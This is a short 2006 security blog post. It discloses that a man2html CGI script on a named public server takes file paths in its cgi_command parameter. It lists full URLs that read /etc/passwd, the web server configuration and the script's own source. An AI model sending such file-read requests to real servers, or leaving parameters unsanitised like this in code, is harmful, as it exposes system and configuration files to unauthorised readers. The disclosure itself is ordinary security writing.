Seth Woolley's Blog

Occasional Musings

Sat Jun 17 15:13:54 2006 -- another man viewer dumb

another man viewer dumb(0)

Synopsis

http://node1.yo-linux.com/cgi-bin/man2html?cgi_command=man

Read the paragraph that reads:

        However,  if  name  contains  a slash (/) then man
interprets it as a file specification, so that you can  do
man ./foo.5 or even man /cd/foo/bar.1.gz.

Description

http://node1.yo-linux.com/cgi-bin/man2html?cgi_command=/etc/passwd

http://node1.yo-linux.com/cgi-bin/man2html?cgi_command=/etc/httpd/conf/httpd.conf

http://node1.yo-linux.com/cgi-bin/man2html?cgi_command=/var/www/cgi-bin/man2html

Looks like there was an attempt to sanitize cgi_section but not cgi_command -- also looks like it was hacked a bit and the sanitation may have been there, but removed later.

Seth Woolley's Blog webdevel security

Leave A Comment

Secret is used for editing your own comment. If subject, secret, and name all are the same as a previous comment, it will be overwritten. Turing is the name of this program (look at the Source Code link on the front page), used to see if you are human.